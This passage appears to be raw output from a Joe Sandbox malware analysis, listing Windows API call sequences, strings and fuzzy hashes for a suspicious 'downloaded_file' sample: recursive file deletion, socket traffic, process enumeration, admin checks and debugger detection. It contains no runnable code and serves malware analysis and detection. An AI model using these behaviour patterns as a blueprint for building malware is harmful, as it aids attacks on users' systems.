                                                                                                            • API ID: File$__snwprintf_memset$FindSleep$AttributesDirectoryRemove$CloseDeleteFirstFolderFreeKnownNextPathTasklstrlen
                                                                                                            • String ID: %s\%s$%s\*.*$%s\System32$\\?\%s
                                                                                                            • API String ID: 1835786642-2457321626
                                                                                                            • Opcode ID: 66cb183104a2395580ebbdb756b4e45d7f1a766e807477f3abb5a7ea881ae408
                                                                                                            • Instruction ID: a0898882b2d29f45e00d6fde64ec1fe5f7bd1c2c3bb9c597b206be5696fe1a6c
                                                                                                            • Opcode Fuzzy Hash: 66cb183104a2395580ebbdb756b4e45d7f1a766e807477f3abb5a7ea881ae408
                                                                                                            • Instruction Fuzzy Hash: BD618FB1910218ABEB39DB60DC89BE97779BF48300F5485D8F519A6180EB759FC8CF90
                                                                                                            APIs
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0031CAA5
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CABD
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CAE2
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CAF2
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 0031CB10
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0031CB2F
                                                                                                            • lstrcmpW.KERNEL32(?,00337444), ref: 0031CB4D
                                                                                                            • lstrcmpW.KERNEL32(?,00337448), ref: 0031CB63
                                                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0031CB88
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CBB9
                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0031CBE4
                                                                                                            • GetLastError.KERNEL32 ref: 0031CBF6
                                                                                                            • LocalFree.KERNEL32(?), ref: 0031CC08
                                                                                                            • wnsprintfW.SHLWAPI ref: 0031CC29
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 0031CC36
                                                                                                            • FindNextFileW.KERNEL32(000000FF,?), ref: 0031CC47
                                                                                                            • FindClose.KERNEL32(000000FF), ref: 0031CC59
                                                                                                            • GetLastError.KERNEL32 ref: 0031CC69
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CC78
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031CC82
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFileFindFreewnsprintf$ErrorLastObjectSingleWaitlstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                            • String ID: %s%s$%s%s\$%s*.*
                                                                                                            • API String ID: 3901725581-784047915
                                                                                                            • Opcode ID: d5c1c8c18c2281ae748b205684f1d8d5ffe25fab82ca81e8f4ee207d6bd79d34
                                                                                                            • Instruction ID: ea2ec99b4665c6b690cadce3838ad9adc6ba848ba5690218b0ea9def093a016e
                                                                                                            • Opcode Fuzzy Hash: d5c1c8c18c2281ae748b205684f1d8d5ffe25fab82ca81e8f4ee207d6bd79d34
                                                                                                            • Instruction Fuzzy Hash: DB516EB0A54209EBDB2AEFA4DD8DBEB7779BF48301F008598F60996190D734AD85CF50
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FA18
                                                                                                            • und_memcpy.LIBCMTD ref: 0031FA3D
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FA4D
• wsprintfW.USER32 ref: 0031FA89
• GetForegroundWindow.USER32(?), ref: 0031FAA2
• SetWindowTextW.USER32(00000000), ref: 0031FAA9
• WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 0031FAB9
• WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000001), ref: 0031FADB
• LocalFree.KERNEL32(00000000), ref: 0031FB03
• CloseHandle.KERNEL32(00000000), ref: 0031FB0D
• LocalFree.KERNEL32(00000000), ref: 0031FB3A
• CloseHandle.KERNEL32(00000000), ref: 0031FB44
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0031FB6A
• LocalFree.KERNEL32(00000000), ref: 0031FB89
• CloseHandle.KERNEL32(00000000), ref: 0031FB93
• CloseHandle.KERNEL32(00000000), ref: 0031FBF5
• LocalFree.KERNEL32(00000000), ref: 0031FBFF
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Local$CloseFreeHandle$EventWindow$AllocCreateEventsForegroundInfoLocaleMultipleSelectTextWait___crtund_memcpywsprintf
• String ID:
• API String ID: 924265577-0
APIs
• LocalAlloc.KERNEL32(00000040,00000318), ref: 00322540
• LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 00322558
• LocalFree.KERNEL32(00000000), ref: 0032256B
• GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00322581
• LocalFree.KERNEL32(00000000), ref: 00322594
Strings
Similarity
• API ID: Local$Free$AddressAllocLibraryLoadProc
• String ID: NTDLL.DLL$RtlGetVersion
• API String ID: 2539306102-196638859
APIs
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0031F805
• und_memcpy.LIBCMTD ref: 0031F82A
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031F83A
• WSAEventSelect.WS2_32(00000000,00000000,00000021), ref: 0031F869
• WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 0031F88A
• LocalFree.KERNEL32(00000000), ref: 0031F8A7
• CloseHandle.KERNEL32(00000000), ref: 0031F8B1
• LocalFree.KERNEL32(00000000), ref: 0031F8D6
• CloseHandle.KERNEL32(00000000), ref: 0031F8E0
• CloseHandle.KERNEL32(00000000), ref: 0031F9C8
• LocalFree.KERNEL32(00000000), ref: 0031F9D2
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
• String ID:
• API String ID: 3749125693-0
APIs
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FC45
• und_memcpy.LIBCMTD ref: 0031FC6A
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FC7A
• WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 0031FCA9
• WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,00000000,00000000), ref: 0031FCCA
• LocalFree.KERNEL32(00000000), ref: 0031FCE7
• CloseHandle.KERNEL32(00000000), ref: 0031FCF1
• LocalFree.KERNEL32(00000000), ref: 0031FD16
• CloseHandle.KERNEL32(00000000), ref: 0031FD20
• CloseHandle.KERNEL32(00000000), ref: 0031FDED
• LocalFree.KERNEL32(00000000), ref: 0031FDF7
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
• String ID:
• API String ID: 3749125693-0
APIs
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FE45
• und_memcpy.LIBCMTD ref: 0031FE6A
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FE7A
• WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 0031FEA9
• WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000000), ref: 0031FECB
• LocalFree.KERNEL32(00000000), ref: 0031FEF3
• CloseHandle.KERNEL32(00000000), ref: 0031FEFD
• LocalFree.KERNEL32(00000000), ref: 0031FF2A
• CloseHandle.KERNEL32(00000000), ref: 0031FF34
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0031FF56
• WSAGetLastError.WS2_32 ref: 0031FF88
• LocalFree.KERNEL32(00000000), ref: 0031FFA8
• CloseHandle.KERNEL32(00000000), ref: 0031FFB2
• CloseHandle.KERNEL32(00000000), ref: 0031FFCA
• LocalFree.KERNEL32(00000000), ref: 0031FFD4
Similarity
• API ID: Local$CloseFreeHandle$Event$AllocCreateErrorEventsInfoLastLocaleMultipleSelectWait___crtund_memcpy
• String ID:
• API String ID: 1311366638-0
APIs
• CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,?,?,?,00309E2A,00000000), ref: 0031BF2D
• CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031BF4D
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0031BFA4
• CryptHashData.ADVAPI32(00000000,00309E2A,00002710,00000000), ref: 0031BFCA
• CryptHashData.ADVAPI32(00000000,00309E2A,00000000,00000000), ref: 0031C000
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C04A
• CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
• CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
Strings
• Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0031BF22
Similarity
• API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
• String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
• API String ID: 1452691613-63410773
APIs
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
  • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: InfoLocale___crtrecv
• String ID:
• API String ID: 818993241-0
APIs
• ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
  • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: InfoLocale___crtsend
• String ID:
• API String ID: 3464212537-0
APIs
• LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,003204A6,?), ref: 00320672
• htons.WS2_32(?), ref: 00320697
• wsprintfA.USER32 ref: 003206C0
  • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
  • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
  • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
  • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
• ___crtGetLocaleInfoEx.LIBCMTD ref: 00320701
  • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
  • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
  • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
  • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
  • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0032073A
  • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
• und_memcpy.LIBCMTD ref: 0032076A
• LocalFree.KERNEL32(00000000), ref: 00320776
• LocalFree.KERNEL32(00000000), ref: 00320784
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpywsprintf
• String ID:
• API String ID: 2352516679-0
APIs
• LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,0032043F,?), ref: 00320532
• htons.WS2_32(?), ref: 00320557
  • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
  • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
  • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
  • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
• ___crtGetLocaleInfoEx.LIBCMTD ref: 0032059D
  • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
  • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
  • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
  • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
  • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
• ___crtGetLocaleInfoEx.LIBCMTD ref: 003205D6
  • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
• und_memcpy.LIBCMTD ref: 00320606
• LocalFree.KERNEL32(00000000), ref: 00320612
• LocalFree.KERNEL32(00000000), ref: 00320620
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpy
• String ID:
• API String ID: 3977134054-0
APIs
• AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031044D
• _memset.LIBCMT ref: 00310463
• SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 003104A0
• LocalAlloc.KERNEL32(00000040,00000014), ref: 003104B3
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 003104C8
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 003104DE
• LocalFree.KERNEL32(00000000), ref: 003104F1
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
Similarity
• API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree_memset
• String ID:
• API String ID: 4046344516-0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00304424
• Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0030444C
• StrCmpIW.SHLWAPI(?,-00374CE4), ref: 00304496
• CloseHandle.KERNEL32(000000FF), ref: 003044A4
• Process32NextW.KERNEL32(000000FF,0000022C), ref: 003044BE
• CloseHandle.KERNEL32(000000FF), ref: 003044CC
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 1789362936-0
                                                                                                            • Opcode ID: 28bb333e4eb869148e28682037ce3e74f2246932e9c6f52f27c0bb0620899992
                                                                                                            • Instruction ID: 36f94aec318b938d8fa28ca72be6915c17758306fdca31097854d468ad21da95
                                                                                                            • Opcode Fuzzy Hash: 28bb333e4eb869148e28682037ce3e74f2246932e9c6f52f27c0bb0620899992
                                                                                                            • Instruction Fuzzy Hash: 5E1151B0902218EBCB35DFA5DD5CB9D77B8BB04300F204698E609A72D0D7389B81DF50
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003044F4
• Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0030451C
• StrCmpIW.SHLWAPI(?,-003758D8), ref: 00304566
• CloseHandle.KERNEL32(000000FF), ref: 00304574
• Process32NextW.KERNEL32(000000FF,0000022C), ref: 0030458E
• CloseHandle.KERNEL32(000000FF), ref: 0030459C
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
• String ID:
• API String ID: 1789362936-0
• Opcode ID: be560d6e52a33434e1e6e1b34572649a023a09399fd113f4eb627290a2f4d97d
• Instruction ID: ffcde23c0d09d70744fbba1c39e7f18088737538a18829b48a3476bea1732a99
• Opcode Fuzzy Hash: be560d6e52a33434e1e6e1b34572649a023a09399fd113f4eb627290a2f4d97d
• Instruction Fuzzy Hash: CD114FB1912218DBCB25DBA4DD5CB99B77CAF45300F204698A50AA7290D7349B81DF40
APIs
• GetCurrentProcessId.KERNEL32 ref: 0031CA09
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0031CA16
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0031CA3A
• CloseHandle.KERNEL32(00000000), ref: 0031CA53
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0031CA6C
• CloseHandle.KERNEL32(00000000), ref: 0031CA7A
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcess32$CreateCurrentFirstNextProcessSnapshotToolhelp32
• String ID:
• API String ID: 3177329567-0
• Opcode ID: e6c7792ee93d0edb22ba165fa61b0d4520e6cbd28bdaf426a2fd4f421b887ab1
• Instruction ID: f64b4ce1fe07057d26c6700bc7c558641fc6fd4fa539bbeda89eb73a5842076d
• Opcode Fuzzy Hash: e6c7792ee93d0edb22ba165fa61b0d4520e6cbd28bdaf426a2fd4f421b887ab1
• Instruction Fuzzy Hash: 39010C74A60208EBDB36DBA4DD8CB9DBBB8BF48701F105598E509A6150D7349F80DB50
APIs
• GetModuleHandleA.KERNEL32(NTDLL,RtlGetVersion), ref: 0031C0AD
• GetProcAddress.KERNEL32(00000000), ref: 0031C0B4
• RtlGetVersion.NTDLL(0000011C), ref: 0031C0DA
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProcVersion
• String ID: NTDLL$RtlGetVersion
• API String ID: 3310240892-3678323915
• Opcode ID: 87d26f354e38e3aadca90afa987e0cfd9c279fd62455059fbf0d821029c2544c
• Instruction ID: 50515230a898125ef533b96b76b4c6e9d6f29b04abd9c56b3e077ef2cfbf10b7
• Opcode Fuzzy Hash: 87d26f354e38e3aadca90afa987e0cfd9c279fd62455059fbf0d821029c2544c
• Instruction Fuzzy Hash: C5F0C074D4521CDBCB359F54EC8DBD9BBB8BB0C315F0001D9A949A2280DB7459E4CF99
APIs
• IsDebuggerPresent.KERNEL32 ref: 0032C560
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0032C575
• UnhandledExceptionFilter.KERNEL32(00338C78), ref: 0032C580
• GetCurrentProcess.KERNEL32(C0000409), ref: 0032C59C
• TerminateProcess.KERNEL32(00000000), ref: 0032C5A3
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: f16e6303ef5961f26cb29acee504373e2fbad4517d443e9f8073d3ada39ed09b
• Instruction ID: 571e14ead9eddb0fde35169d9ee782eeba9309415dc70b116662d52de2a07eff
• Opcode Fuzzy Hash: f16e6303ef5961f26cb29acee504373e2fbad4517d443e9f8073d3ada39ed09b
• Instruction Fuzzy Hash: 1121C9B48112049FD723EF29FD896583BBCBF58320F50505AE50E9B7A1EBB059C5CB02
APIs
• CoInitializeEx.COMBASE(00000000,00000000), ref: 00312AE0
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00312B06
• CoCreateInstance.OLE32(00337B50,00000000,00000001,00337940,00000000), ref: 00312B21
• CoUninitialize.COMBASE ref: 00312DDD
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Initialize$CreateInstanceSecurityUninitialize
• String ID:
• API String ID: 374467530-0
• Opcode ID: a85bc5ea0d06235928c2b6887f5883171dfc6492d961720be03cafe51a328fb7
• Instruction ID: da8d26ad14345bbf23c6b33b8aea4966802a29c83e4aba62c54f02ffcf5f7b86
• Opcode Fuzzy Hash: a85bc5ea0d06235928c2b6887f5883171dfc6492d961720be03cafe51a328fb7
• Instruction Fuzzy Hash: CFB1C674E00219DFDB59DF98C991B9DFBB1BF48310F208299D519AB391D7306A81CF91
APIs
• AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0031C3DB
• CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0031C3F4
• FreeSid.ADVAPI32(?), ref: 0031C409
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 0a17bf6cffcf66c7108508268b8328230370c6e95c714d7242158a87e51aad48
• Instruction ID: 0a8b36058cda8decb7debbbc4f9f87c0b0d0bf5514c5f03d4a2cc29a3ee042b1
• Opcode Fuzzy Hash: 0a17bf6cffcf66c7108508268b8328230370c6e95c714d7242158a87e51aad48
• Instruction Fuzzy Hash: E501FB34D44348FAEB12DBE8C859BEEBFB8AF18704F0444C8E544AA2C1D7B56684CB91
APIs
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0031716A
• ___crtGetLocaleInfoEx.LIBCMTD ref: 00317187
  • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
• closesocket.WS2_32(?), ref: 00317193
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: InfoLocale___crtclosesocketsendsetsockopt
• String ID:
• API String ID: 1028938620-0
APIs
• GetCurrentProcess.KERNEL32(0037CB2C,?,00313EE3), ref: 00305728
• IsWow64Process.KERNEL32(00000000,?,00313EE3), ref: 0030572F
• GetProcessHeap.KERNEL32(?,00313EE3), ref: 00305735
Memory Dump Source
